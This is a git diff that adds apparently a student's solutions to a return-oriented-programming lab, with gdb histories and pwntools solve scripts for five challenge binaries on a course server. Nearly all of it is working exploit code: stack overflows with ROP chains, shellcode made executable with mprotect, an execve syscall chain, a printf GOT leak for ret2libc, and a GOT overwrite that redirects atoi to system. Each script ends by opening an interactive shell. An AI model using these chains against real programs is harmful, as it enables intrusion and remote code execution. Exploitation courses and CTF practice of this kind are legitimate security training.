rop and lab3_4_recap

rop/01_toolkit/.gdb_history

@@ -0,0 +1,11 @@
+r
+disass win
+disass main
+disass main
+disass win
+quit
+disass win
+disass main
+disass wuln
+disass vuln
+quit

rop/01_toolkit/solve.py

@@ -0,0 +1,31 @@
+from pwn import *
+
+OFFSET = 64
+context.binary = elf = ELF("./toolkit", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13554)
+
+var1 = 0x1111111111111111
+var2 = 0x2222222222222222
+var3 = 0x3333333333333333
+
+pop_rdi = 0x00000000004011FF
+pop_rdx = 0x0000000000401211
+pop_rsi = 0x0000000000401208
+ret = 0x000000000040101A
+win = 0x000000000040121E
+print(p.recvuntil(b"[toolkit] Input: "))
+payload = flat(
+    b"A" * OFFSET,
+    p64(ret),
+    p64(pop_rdi),
+    p64(var1),
+    p64(pop_rsi),
+    p64(var2),
+    p64(pop_rdx),
+    p64(var3),
+    p64(win),
+)
+p.send(payload)
+p.send(b"\n")
+p.interactive()

rop/02_forge/.gdb_history

@@ -0,0 +1,7 @@
+disass vuln
+disass win
+disass vuln
+disass main
+disass shellcode
+r
+disass main

rop/02_forge/solve.py

@@ -0,0 +1,37 @@
+from pwn import *
+
+context.binary = elf = ELF("./forge", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13574)
+OFF_INPUT = 64
+ret = 0x000000000040101A
+pop_rdi = 0x00000000004011FB
+pop_rsi = 0x0000000000401204
+pop_rdx = 0x000000000040120D
+shellcode_addr = 0x0000000000404080
+MPROTECT_PLT = elf.plt["mprotect"]
+PROT = 0x7
+
+print(p.recvuntil(b"[forge] Send shellcode:\n"))
+shellcode = flat(asm(shellcraft.sh()))
+SHELLCODE_SIZE = 200
+p.send(shellcode)
+# p.send(b"A")
+# p.send(b"\n")
+print(p.recvuntil(b"[forge] Input:\n"))
+payload = flat(
+    b"A" * OFF_INPUT,
+    p64(ret),
+    p64(pop_rdi),
+    p64(shellcode_addr & 0xFFFFF000),  # Must be page aligned
+    p64(pop_rsi),
+    4096,
+    p64(pop_rdx),
+    p64(PROT),
+    # p64(ret),
+    p64(MPROTECT_PLT),
+    p64(shellcode_addr),
+)
+p.send(payload)
+# p.send(b"\n")
+p.interactive()

rop/03_chain_reactor/.gdb_history

@@ -0,0 +1,8 @@
+disass main
+disass vuln
+disass main
+b *0x000000000040132a
+r
+c
+disass win
+quit

rop/03_chain_reactor/solve.py

@@ -0,0 +1,24 @@
+from pwn import *
+
+OFF = 64
+pop_rdi = 0x000000000040121F
+pop_rsi = 0x0000000000401221
+ret = 0x000000000040101A
+var1 = 0xC0FFEE
+var2 = 0xBADC0DE
+win = 0x0000000000401226
+context.binary = elf = ELF("./chain_reactor", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13510)
+print(p.recvuntil(b"[chain-reactor] Enter activation codes: "))
+payload = flat(
+    b"A" * 64,
+    p64(ret),
+    p64(pop_rdi),
+    p64(var1),
+    p64(pop_rsi),
+    p64(var2),
+    p64(win),
+)
+p.sendline(payload)
+p.interactive()

rop/04_arsenal/.gdb_history

@@ -0,0 +1,8 @@
+quit
+disass main
+disass vuln
+r
+disass vuln
+disass main
+vmmap
+quit

rop/04_arsenal/solve.py

@@ -0,0 +1,38 @@
+from pwn import *
+
+OFF = 64
+context.binary = elf = ELF("./arsenal", checksec=False)
+shellstr = b"/bin/sh\x00"
+ret = 0x000000000040101A
+pop_rdi = 0x000000000040196E
+pop_rsi = 0x0000000000401977
+pop_rdx = 0x0000000000401980
+pop_rax = 0x0000000000401989  # Assign 59 (execve) to rax
+syscall = 0x0000000000401324
+WRITE_ADDR = 0x4AA000
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13594)
+print(p.recvuntil(b"[arsenal] The armory is open -- pick your weapons:\n"))
+mov_qword_ptr_rdx_rax = 0x000000000040AB18  # mov qword ptr [rdx], rax; ret
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(pop_rdx),
+    p64(WRITE_ADDR),
+    p64(pop_rax),
+    shellstr,
+    p64(mov_qword_ptr_rdx_rax),  # Write /bin/sh to a writable address in memory
+    p64(pop_rax),
+    p64(0x3B),  # 59 is the execve syscall
+    p64(pop_rdi),
+    p64(
+        WRITE_ADDR
+    ),  # Address where I wrote /bin/sh so in RDI there is a pointer (char*)
+    p64(pop_rsi),
+    p64(0),
+    p64(pop_rdx),
+    p64(0),
+    p64(syscall),
+)
+p.sendline(payload)
+p.interactive()

rop/04_arsenal/test.c

@@ -0,0 +1,6 @@
+#include <unistd.h>
+#include <stdio.h>
+int main(){
+    execve("/bin/sh",0,0);
+    return 0;
+}

rop/05_padlock/.gdb_history

@@ -0,0 +1,44 @@
+disass main
+disass vuln
+r
+disass win
+vmmap
+disass main
+disass vuln
+disass main
+disass vuln
+got
+quit
+got
+r
+got
+b vuln
+r
+got
+n
+got
+n
+disass vuln
+b *0x401282
+c
+got
+b main
+r
+got
+r
+got
+find
+find %
+find x
+search "%x"
+search "[padlock]"
+R
+r
+search "[padlock]"
+got
+search "[padlock]"
+r
+got
+c
+got
+quit

rop/05_padlock/solve.py

@@ -0,0 +1,68 @@
+from pwn import *
+
+OFF = 80
+context.binary = elf = ELF("./padlock", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+libc = ELF("./libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13582)
+PRINTF_PLT = elf.plt["printf"]
+ATOI_PLT = elf.plt["atoi"]
+PRINTF_GOT = elf.got["printf"]
+READ_GOT = elf.got["read"]
+MAIN = elf.sym["main"]
+
+pop_rdi = 0x00000000004011FF  # format string
+pop_rsi = 0x0000000000401208  # got address
+pop_rdx = 0x0000000000401211
+ret = 0x000000000040101A
+mov_eax_pop_rbp = 0x4012B0
+mov_eax = 0x000000000040127D
+# Mi serve scrivere binsh da qualche parte
+# Mi serve trovare libc addr e chiamare system
+rw_addr = 0x405000
+# search it in libc
+BINSH = next(libc.search(b"/bin/sh\x00"))
+format_addr = 0x402028
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    # ATOI returns in rax, make it return 0 to set rax
+    p64(pop_rdi),
+    p64(format_addr),
+    p64(ATOI_PLT),
+    p64(pop_rdi),
+    # Since the GOT is a ptr I directly give it to printf to print the actual libc address
+    p64(PRINTF_GOT),
+    p64(ret),
+    p64(PRINTF_PLT),
+    p64(ret),
+    p64(MAIN),
+)
+p.send(payload)
+print(p.recvline())
+# print(p.recvline())
+leaked = p.recvline().strip().split(b"[")[0]
+leak_printf = u64(leaked.ljust(8, b"\x00"))
+print(f"Leaked addr:{hex(leak_printf)}")
+print(p.recvuntil(b"combination: "))
+libc.address = leak_printf - libc.symbols["printf"]
+
+BINSH = next(libc.search(b"/bin/sh\x00"))
+payload2 = flat(
+    b"A" * OFF,
+    # p64(ret),
+    p64(pop_rdi),
+    p64(BINSH),
+    p64(pop_rsi),
+    p64(0),
+    p64(pop_rdx),
+    p64(0),
+    # p64(ret),
+    p64(libc.symbols["execve"]),
+)
+print(f"Binsh: {hex(BINSH)} System: {hex(libc.symbols['execve'])}")
+p.sendline(payload2)
+p.interactive()
+# print(p.recvuntil(b"[padlock] Decimal combination: "))

rop/05_padlock/solve2.py

@@ -0,0 +1,44 @@
+from pwn import *
+
+OFF = 80
+context.binary = elf = ELF("./padlock", checksec=False)
+libc = ELF("/usr/lib/libc.so.6", checksec=False)
+libc = ELF("./libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13543)
+
+add_what = elf.sym["add_what_where"]
+atoi_got = elf.got["atoi"]
+main = elf.sym["main"]
+
+pop_rdi = 0x00000000004011FF  # format string
+pop_rsi = 0x0000000000401208  # got address
+pop_rdx = 0x0000000000401211
+ret = 0x000000000040101A
+
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+
+# populate got table
+first_run = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(main),
+)
+p.sendline(first_run)
+
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+diff = libc.symbols["system"] - libc.symbols["atoi"]
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(pop_rdi),
+    p64(atoi_got),
+    p64(pop_rsi),
+    p64(diff),
+    p64(add_what),
+    p64(ret),
+    p64(main),
+)
+p.sendline(payload)
+p.sendline(b"/bin/sh")
+p.interactive()

rop/05_padlock/test.c

@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main(){
+    int var1 = 5;
+    printf("Address: %d",&var1);
+    return 0;
+}